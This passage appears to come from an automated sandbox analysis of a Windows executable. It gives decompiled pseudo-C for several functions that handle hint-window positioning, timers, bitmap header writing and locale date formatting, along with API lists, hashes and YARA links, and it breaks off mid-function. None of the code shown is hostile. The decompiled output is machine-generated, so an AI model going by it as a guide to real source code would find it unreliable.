				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t135;
				struct HWND__* _t171;
				intOrPtr _t193;
				char _t199;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t262;
				intOrPtr _t281;
				intOrPtr _t282;
				intOrPtr _t284;
				intOrPtr _t290;
				intOrPtr* _t319;
				intOrPtr _t320;
				void* _t327;

				_t326 = _t327;
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t281 =  *0x44c43c; // 0x44c440
				E00404D24( &_v100, _t281);
				_t262 =  &_v8;
				_push(_t327);
				_push(0x456763);
				_push( *[fs:eax]);
				 *[fs:eax] = _t327 + 0xffffff70;
				 *((char*)( *_t262 + 0x58)) = 0;
				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044C7F4() == 0 || E00453DB8(E00434420( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
					L23:
					_t135 = _v52;
					__eflags = _t135;
					if(_t135 <= 0) {
						E004561CC( *_t262);
					} else {
						E00455FD4( *_t262, 0, _t135);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E00456204();
					_v84 = E0045317C();
					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
					E00435514( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
					_t333 = _t319;
					if(_t319 == 0) {
						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
						_t290 =  *0x431d04; // 0x431d50
						_t171 = E00403768(_t320, _t290);
						__eflags = _t171;
						if(_t171 != 0) {
							__eflags =  *(_t320 + 0x190);
							if( *(_t320 + 0x190) != 0) {
								ClientToScreen( *(_t320 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t319 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E004356B8( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00453D80( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
					E00432CA8(_v148,  &_v140,  &_v144, _t333);
					E004043E0( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
					_t193 =  *0x476b44; // 0x432278
					_v96 = _t193;
					_v40 = 0;
					_v33 = E00436D28( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
						_t199 = 0;
					} else {
						_t199 = 1;
					}
					_t296 =  *_t262;
					 *((char*)( *_t262 + 0x58)) = _t199;
					if( *((char*)( *_t262 + 0x58)) == 0) {
						goto L23;
					} else {
						_t340 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E00456358(_v96, _t296, _t326);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E004037D8( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
							_v116.left = _v116.left - E00420540( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
							_v116.right = _v116.right - E00420540( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
						}
						E0043568C( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
						_t223 =  *_t262;
						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
						E0043568C( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
						_t227 =  *_t262;
						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
						E00435D14( *((intOrPtr*)( *_t262 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
						E00453ECC(_v44);
						_t236 = _v52;
						if(_v52 <= 0) {
							E00455FD4( *_t262, 1, _v48);
						} else {
							E00455FD4( *_t262, 0, _t236);
						}
						L26:
						_pop(_t282);
						 *[fs:eax] = _t282;
						_push(0x45676a);
						E0040436C( &_v148, 2);
						_t284 =  *0x44c43c; // 0x44c440
						return E00404DF4( &_v100, _t284);
					}
				}
			}

0x004563b9
0x004563c6
0x004563cc
0x004563d7
0x004563d8
0x004563d9
0x004563df
0x004563e5
0x004563ea
0x004563ef
0x004563f0
0x004563f5
0x004563f8
0x004563fd
0x0045640a
0x0045671c
0x0045671c
0x0045671f
0x00456721
0x00456732
0x00456723
0x00456729
0x00456729
0x00000000
0x00456443
0x00456448
0x0045644e
0x00456454
0x0045645c
0x00456469
0x00456471
0x0045647c
0x00456487
0x00456488
0x00456489
0x0045648a
0x00456495
0x0045649a
0x0045649f
0x004564a7
0x004564aa
0x004564ac
0x004564bc
0x004564c1
0x004564c7
0x004564cc
0x004564ce
0x004564d0
0x004564d7
0x004564e4
0x004564e4
0x004564d7
0x004564ae
0x004564b5
0x004564b5
0x004564fb
0x0045650e
0x00456519
0x00456522
0x00456530
0x00456541
0x0045654f
0x00456556
0x0045655e
0x00456561
0x00456566
0x0045656b
0x00456585
0x0045658d
0x004565ad
0x004565ad
0x004565b7
0x004565c1
0x004565c5
0x004565c5
0x004565c5
0x004565c7
0x004565c9
0x004565d2
0x00000000
0x004565d8
0x004565d8
0x004565dc
0x00000000
0x00000000
0x004565e6
0x004565fe
0x00456619
0x0045662b
0x00456643
0x0045665e
0x0045667a
0x0045667a
0x0045668b
0x00456690
0x00456698
0x004566a1
0x004566b2
0x004566b7
0x004566bf
0x004566c8
0x004566d6
0x004566ef
0x004566f5
0x004566fa
0x004566ff
0x00456715
0x00456701
0x00456707
0x00456707
0x00456737
0x00456739
0x0045673c
0x0045673f
0x0045674f
0x00456757
0x00456762
0x00456762
0x004565d2

APIs

Part of subcall function 0044C7F4: GetActiveWindow.USER32 ref: 0044C7F7
Part of subcall function 0044C7F4: GetCurrentThreadId.KERNEL32 ref: 0044C80C
Part of subcall function 0044C7F4: 72E7AC10.USER32(00000000,0044C7D4), ref: 0044C812

Part of subcall function 00456204: GetCursor.USER32(?), ref: 0045621F
Part of subcall function 00456204: GetIconInfo.USER32(00000000,?), ref: 00456225

ClientToScreen.USER32(?,?), ref: 004564E4
OffsetRect.USER32(?,?,?), ref: 004564FB
OffsetRect.USER32(?,?,?), ref: 0045662B

Part of subcall function 00455FD4: SetTimer.USER32(00000000,00000000,?,00453DD8), ref: 00455FEE

Strings

x"C, xrefs: 00456561

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
String ID: x"C
API String ID: 3022406661-3989092080
Opcode ID: 585126cc80ca6015a07ca28d9b345bf2d8f416a0fe101d06df0c7b29d0d34172
Instruction ID: fd2f906bf4e1ba9d7d0e8727a3be0329d4ef2a06f7fb95116565e09485ce8d40
Opcode Fuzzy Hash: 585126cc80ca6015a07ca28d9b345bf2d8f416a0fe101d06df0c7b29d0d34172
Instruction Fuzzy Hash: C8D1F575A006188FCB10DFA8C884B9EB7F5BF09304F5581AAE904EB366DB34AD49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0045EDFC, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 276
timeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0045EDFC(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				char _v21;
				char _v124;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t145;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr _t193;
				signed int _t197;
				signed int _t204;
				intOrPtr _t213;
				intOrPtr _t215;
				signed int _t224;
				signed int _t237;
				signed int _t240;
				void* _t248;
				void* _t252;
				signed int _t253;
				intOrPtr _t268;
				intOrPtr _t284;
				void* _t295;
				signed int _t297;
				intOrPtr _t304;

				_v9 = __ecx;
				_t253 = __edx;
				_v8 = __eax;
				_t294 = _a8;
				_v21 = 0;
				E0045FCB0(_v8, __edx, _a8, _t295);
				_t145 = _v8;
				_t305 =  *(_t145 + 0x1c) & 0x00000010;
				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
					L5:
					__eflags = _t253;
					if(_t253 != 0) {
						L8:
						__eflags = _t253;
						if(_t253 != 0) {
							L37:
							_push(0x45f1a7);
							_push( *[fs:eax]);
							 *[fs:eax] = _t304;
							E00437140(_v8, _t253, _a4, _t294);
							_pop(_t268);
							 *[fs:eax] = _t268;
							return 0;
						}
						E0045C724(_v8,  &_v124);
						_t296 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
						__eflags =  *((char*)(_v8 + 0x28e));
						if(__eflags != 0) {
							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
							if(__eflags == 0) {
								_t296 = 0xffc8;
								_t237 = E004037D8(_v8, __eflags);
								__eflags = _t237;
								if(_t237 != 0) {
									_t240 = E00435578(_v8) -  *(_v8 + 0x264);
									__eflags = _t240;
									 *(_v8 + 0x264) = _t240;
								}
							}
							return E0045D118(_v8, _t253,  &_v124, _t294, _t296);
						}
						_t259 = _a4;
						E0045C6C8(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
						_t169 = _v8;
						_t297 = _v20;
						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
							L25:
							_t171 = _v8;
							__eflags =  *(_t171 + 0x249) & 0x00000001;
							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
								L31:
								_t172 = _v8;
								__eflags =  *(_t172 + 0x249) & 0x00000002;
								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
									__eflags = _v16;
									if(_v16 >= 0) {
										_t173 = _v8;
										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
											if(__eflags <= 0) {
												_t177 = _v20;
												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
												E00412B58(_t294,  &_v132, _a4, _t294, _t297);
												_push( &_v132);
												_t184 = E004037D8(_v8, __eflags);
												__eflags = _t184;
												if(_t184 != 0) {
													 *((char*)(_v8 + 0x28e)) = 5;
													 *((intOrPtr*)( *_v8 + 0x88))();
													E0045D258(_v8, _t253, _t294, 0xffa3);
													_v21 = 1;
													SetTimer(E0043C1F4(_v8), 1, 0x3c, 0);
												}
											}
										}
									}
								}
								goto L37;
							}
							__eflags = _v20;
							if(_v20 < 0) {
								goto L31;
							}
							_t193 = _v8;
							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
							if(__eflags > 0) {
								goto L31;
							}
							_t197 = _v16;
							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
							E00412B58(_t294,  &_v132, _a4, _t294, _t297);
							_push( &_v132);
							_t204 = E004037D8(_v8, __eflags);
							__eflags = _t204;
							if(_t204 != 0) {
								 *((char*)(_v8 + 0x28e)) = 4;
								 *((intOrPtr*)( *_v8 + 0x88))();
								E0045D258(_v8, _t253, _t294, 0xffa2);
								_v21 = 1;
								SetTimer(E0043C1F4(_v8), 1, 0x3c, 0);
							}
							goto L37;
						}
						_t213 = _v8;
						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
							goto L25;
						}
						_t215 = _v8;
						__eflags =  *(_t215 + 0x249) & 0x00000004;
						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
							 *((char*)(_v8 + 0x28e)) = 1;
							SetTimer(E0043C1F4(_v8), 1, 0x3c, 0);
							__eflags = _v9 & 0x00000001;
							if((_v9 & 0x00000001) == 0) {
								E0045DD90(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
							} else {
								E0045DD08(_v8, _t259,  &_v20, _t294);
							}
							goto L37;
						}
						_t284 = _v8;
						_t224 = _v20;
						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
							L20:
							E0045DD90(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
							E0045FD8C(_v8, _t294, _t297);
							L21:
							E004037D8(_v8, __eflags);
							goto L37;
						}
						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
						if(__eflags != 0) {
							goto L20;
						}
						E0045B670(_v8);
						goto L21;
					}
					__eflags = _v9 & 0x00000040;
					if(__eflags == 0) {
						goto L8;
					} else {
						E004037D8(_v8, __eflags);
						goto L37;
					}
				}
				if(E004037D8(_v8, _t305) != 0) {
					L3:
					 *((intOrPtr*)( *_v8 + 0xc0))();
					_t248 = E0045B5E0(_v8, _t307);
					_t308 = _t248;
					if(_t248 == 0) {
						return E00435DAC(_v8, 0, _t308);
					}
					goto L5;
				}
				_t252 = E0044CA0C(_v8);
				_t307 = _t252;
				if(_t252 != 0) {
					goto L5;
				}
				goto L3;
			}

0x0045ee05
0x0045ee08
0x0045ee0a
0x0045ee0d
0x0045ee10
0x0045ee17
0x0045ee1c
0x0045ee1f
0x0045ee23
0x0045ee67
0x0045ee67
0x0045ee69
0x0045ee82
0x0045ee82
0x0045ee84
0x0045f17d
0x0045f180
0x0045f185
0x0045f188
0x0045f198
0x0045f19f
0x0045f1a2
0x00000000
0x0045f1a2
0x0045ee90
0x0045eec5
0x0045eec7
0x0045eed0
0x0045eed7
0x0045eedc
0x0045eee3
0x0045eee8
0x0045eeec
0x0045eef1
0x0045eef3
0x0045ef00
0x0045ef00
0x0045ef09
0x0045ef09
0x0045eef3
0x00000000
0x0045ef15
0x0045ef27
0x0045ef2f
0x0045ef34
0x0045ef3d
0x0045ef40
0x0045ef42
0x0045f002
0x0045f002
0x0045f005
0x0045f00c
0x0045f0c6
0x0045f0c6
0x0045f0c9
0x0045f0d0
0x0045f0d6
0x0045f0da
0x0045f0e0
0x0045f0e9
0x0045f0ec
0x0045f0fb
0x0045f0fe
0x0045f103
0x0045f106
0x0045f10f
0x0045f11d
0x0045f125
0x0045f13f
0x0045f144
0x0045f146
0x0045f14b
0x0045f157
0x0045f160
0x0045f165
0x0045f178
0x0045f178
0x0045f146
0x0045f0fe
0x0045f0ec
0x0045f0da
0x00000000
0x0045f0d0
0x0045f012
0x0045f016
0x00000000
0x00000000
0x0045f01c
0x0045f025
0x0045f028
0x00000000
0x00000000
0x0045f037
0x0045f03a
0x00000000
0x00000000
0x0045f043
0x0045f046
0x0045f04f
0x0045f05d
0x0045f065
0x0045f07f
0x0045f084
0x0045f086
0x0045f08f
0x0045f09b
0x0045f0a4
0x0045f0a9
0x0045f0bc
0x0045f0bc
0x00000000
0x0045f086
0x0045ef48
0x0045ef51
0x0045ef54
0x00000000
0x00000000
0x0045ef5a
0x0045ef5d
0x0045ef64
0x0045efbb
0x0045efd1
0x0045efd6
0x0045efda
0x0045eff8
0x0045efdc
0x0045efe2
0x0045efe2
0x00000000
0x0045efda
0x0045ef66
0x0045ef6f
0x0045ef72
0x0045ef74
0x0045ef8e
0x0045ef9a
0x0045efa2
0x0045efa7
0x0045efae
0x00000000
0x0045efae
0x0045ef7f
0x0045ef82
0x00000000
0x00000000
0x0045ef87
0x00000000
0x0045ef87
0x0045ee6b
0x0045ee6f
0x00000000
0x0045ee71
0x0045ee78
0x00000000
0x0045ee78
0x0045ee6f
0x0045ee33
0x0045ee41
0x0045ee46
0x0045ee4f
0x0045ee54
0x0045ee56
0x00000000
0x0045ee5d
0x00000000
0x0045ee56
0x0045ee38
0x0045ee3d
0x0045ee3f
0x00000000
0x00000000
0x00000000

APIs

SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045EFD1
SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F0BC
SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045F178

Strings

@, xrefs: 0045EE6B

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer
String ID: @
API String ID: 2870079774-2766056989
Opcode ID: 277efad1124f353acaae576ad763c253c0251cad4085aaa46d3643ed720e3f54
Instruction ID: ab6b22797005bf25710cea3a170a4cdf27d12ab71d425799125bb5ef16b91ff9
Opcode Fuzzy Hash: 277efad1124f353acaae576ad763c253c0251cad4085aaa46d3643ed720e3f54
Instruction Fuzzy Hash: 0AC13934A04208EFCB10DB99C985BDEB7F5AF04345F2441A6EC04AB392CB79AF49DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00425868, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425868(void* __eax, signed int __ecx, intOrPtr* __edx, void* __eflags) {
				void* __ebp;
				signed int _t93;
				void* _t108;
				signed int _t114;
				void* _t125;
				signed int _t140;
				signed int _t146;
				signed int _t160;
				intOrPtr _t197;
				intOrPtr* _t201;
				void* _t202;
				intOrPtr _t204;
				signed int* _t205;

				_t160 = __ecx;
				_t201 = __edx;
				_t202 = __eax;
				E00402EF0( &(_t205[4]), 0xe);
				_t205[4] = 0x4d42;
				_t203 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c));
				if( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)) != 0) {
					 *_t205 = E004168E8(_t203);
					if(_t160 != 0) {
						E00416B18(_t201, 4, _t205);
					}
					E004168E8( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)));
					return  *((intOrPtr*)( *_t201 + 0xc))();
				}
				E004249A4(_t202, 0xe);
				_t204 =  *((intOrPtr*)(_t202 + 0x28));
				 *_t205 = 0;
				_t93 =  *(_t204 + 0x14);
				__eflags = _t93;
				if(__eflags != 0) {
					 *_t205 =  *_t205 + _t205[2] + 0xe;
					E00402EF0( &(_t205[4]), 0xe);
					_t205[4] = 0x4d42;
					_t125 = E00424868(_t202);
					_t197 =  *0x425b1c; // 0x1
					E004207D8(_t125, 0, _t197);
					_t205[3] = E00420AFC(SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4),  *(_t204 + 0x14)));
					_t205[1] = GetDIBColorTable( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), 0, 0x100,  &(_t205[0xa]));
					SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), _t205[3]);
					_t140 =  *(_t204 + 0x50);
					__eflags = _t140;
					if(_t140 > 0) {
						__eflags = _t140 - _t205[1];
						if(_t140 < _t205[1]) {
							_t205[1] = _t140;
						}
					}
					__eflags =  *((char*)(_t204 + 0x70));
					if( *((char*)(_t204 + 0x70)) == 0) {
						__eflags = _t205[1];
						if(_t205[1] == 0) {
							__eflags =  *(_t204 + 0x10);
							if( *(_t204 + 0x10) != 0) {
								__eflags =  *((char*)(_t204 + 0x71));
								if( *((char*)(_t204 + 0x71)) == 0) {
									_t205[1] = E00421290( *(_t204 + 0x10), 0xff,  &(_t205[0xa]));
									__eflags =  *((short*)(_t204 + 0x3e)) - 8;
									if( *((short*)(_t204 + 0x3e)) > 8) {
										_t146 = _t205[1] << 2;
										 *_t205 =  *_t205 + _t146;
										_t47 =  &(_t205[2]);
										 *_t47 = _t205[2] + _t146;
										__eflags =  *_t47;
									}
								}
							}
						}
					}
					_t205[4] =  *_t205;
					_t93 = _t205[2] + 0xe;
					__eflags = _t93;
					_t205[6] = _t93;
				}
				__eflags = _t160;
				if(_t160 != 0) {
					_t93 = E00416B18(_t201, 4, _t205);
				}
				__eflags =  *_t205;
				if( *_t205 == 0) {
					return _t93;
				} else {
					E00423980(_t204 + 0x18);
					__eflags = _t205[1];
					if(_t205[1] == 0) {
						L27:
						__eflags =  *((char*)(_t204 + 0x70));
						if( *((char*)(_t204 + 0x70)) == 0) {
							E00416B18(_t201, 0xe,  &(_t205[4]));
							E00416B18(_t201, 0x28, _t204 + 0x30);
							__eflags =  *((short*)(_t204 + 0x3e)) - 8;
							if( *((short*)(_t204 + 0x3e)) > 8) {
								__eflags =  *(_t204 + 0x40) & 0x00000003;
								if(( *(_t204 + 0x40) & 0x00000003) != 0) {
									E00416B18(_t201, 0xc, _t204 + 0x58);
								}
							}
						} else {
							_t108 = _t204 + 0x30;
							_t205[7] = 0xc;
							_t205[8] =  *((intOrPtr*)(_t108 + 4));
							_t205[9] =  *((intOrPtr*)(_t108 + 8));
							_t205[9] = 1;
							_t205[0xa].rgbBlue =  *((intOrPtr*)(_t108 + 0xe));
							E00416B18(_t201, 0xe,  &(_t205[4]));
							E00416B18(_t201, 0xc,  &(_t205[7]));
						}
						__eflags = 0 * _t205[1];
						E00416B18(_t201, 0 * _t205[1],  &(_t205[0xa]));
						return E00416B18(_t201,  *((intOrPtr*)(_t204 + 0x44)),  *((intOrPtr*)(_t204 + 0x2c)));
					}
					_t114 =  *(_t204 + 0x50);
					__eflags = _t114;
					if(_t114 == 0) {
						L24:
						 *(_t204 + 0x50) = _t205[1];
						L25:
						__eflags =  *((char*)(_t204 + 0x70));
						if( *((char*)(_t204 + 0x70)) != 0) {
							E00420F6C( &(_t205[0xa]),  &(_t205[1]));
						}
						goto L27;
					}
					__eflags = _t114 - _t205[1];
					if(_t114 == _t205[1]) {
						goto L25;
					}
					goto L24;
				}
			}

0x00425872
0x00425874
0x00425876
0x00425883
0x00425888
0x00425892
0x00425897
0x004258a0
0x004258a5
0x004258b0
0x004258b0
0x004258bd
0x00000000
0x004258cb
0x004258d5
0x004258da
0x004258df
0x004258e2
0x004258e5
0x004258e7
0x0042592d
0x0042593b
0x00425940
0x00425949
0x0042594e
0x00425954
0x0042596e
0x0042598a
0x0042599a
0x0042599f
0x004259a2
0x004259a4
0x004259a6
0x004259aa
0x004259ac
0x004259ac
0x004259aa
0x004259b0
0x004259b4
0x004259b6
0x004259bb
0x004259bd
0x004259c1
0x004259c3
0x004259c7
0x004259da
0x004259de
0x004259e3
0x004259e9
0x004259ec
0x004259ef
0x004259ef
0x004259ef
0x004259ef
0x004259e3
0x004259c7
0x004259c1
0x004259bb
0x004259f6
0x004259fe
0x004259fe
0x00425a01
0x00425a01
0x00425a05
0x00425a07
0x00425a12
0x00425a12
0x00425a17
0x00425a1b
0x00425b1b
0x00425a21
0x00425a24
0x00425a29
0x00425a2e
0x00425a57
0x00425a57
0x00425a5b
0x00425ab7
0x00425ac6
0x00425acb
0x00425ad0
0x00425ad2
0x00425ad6
0x00425ae2
0x00425ae2
0x00425ad6
0x00425a5d
0x00425a5d
0x00425a60
0x00425a6c
0x00425a75
0x00425a7a
0x00425a85
0x00425a95
0x00425aa5
0x00425aa5
0x00425af4
0x00425aff
0x00000000
0x00425b0c
0x00425a30
0x00425a33
0x00425a35
0x00425a3d
0x00425a41
0x00425a44
0x00425a44
0x00425a48
0x00425a52
0x00425a52
0x00000000
0x00425a48
0x00425a37
0x00425a3b
0x00000000
0x00000000
0x00000000
0x00425a3b

APIs

SelectObject.GDI32(?,?), ref: 00425964
GetDIBColorTable.GDI32(?,00000000,00000100,?,?,?), ref: 00425985
SelectObject.GDI32(?,?), ref: 0042599A

Strings

BM, xrefs: 00425940

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$ColorTable
String ID: BM
API String ID: 2377976745-2348483157
Opcode ID: 75e0b7d0b2eb3649f714a7ae3412576ef9d74cb97860069a7db512d56ad6f6f4
Instruction ID: daff64143ac8cf68bee3c4e96bd5475589aa625f01f8dfe3b702187162300c3b
Opcode Fuzzy Hash: 75e0b7d0b2eb3649f714a7ae3412576ef9d74cb97860069a7db512d56ad6f6f4
Instruction Fuzzy Hash: DB8129707083559BD710EF28D485BAE77E1AF88304F45892EF888CB391D778E985CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00409CE8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409CE8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x409eb2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404348(__edx);
				E004099B0(GetThreadLocale(), 0x409ec8, 0x1009,  &_v12);
				if(E0040879C(0x409ec8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404600(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x4760c0], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408D14(_t124 + _t92 - 1, 2, 0x409ecc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408D14(_t124 + _t92 - 1, 4, 0x409edc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408D14(_t124 + _t92 - 1, 2, 0x409ef4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404608(_t122, 0x409f0c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404528();
												E00404608(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404608(_t122, 0x409f00);
										_t92 = _t92 + 1;
									}
								} else {
									E00404608(_t122, 0x409eec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404608(_t122, 0x409ed8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040AA30(_t124, _t92);
							E00404858(_t124, _v8, _t92,  &_v20);
							E00404608(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x4927f4; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E0040439C(_t122, _t124);
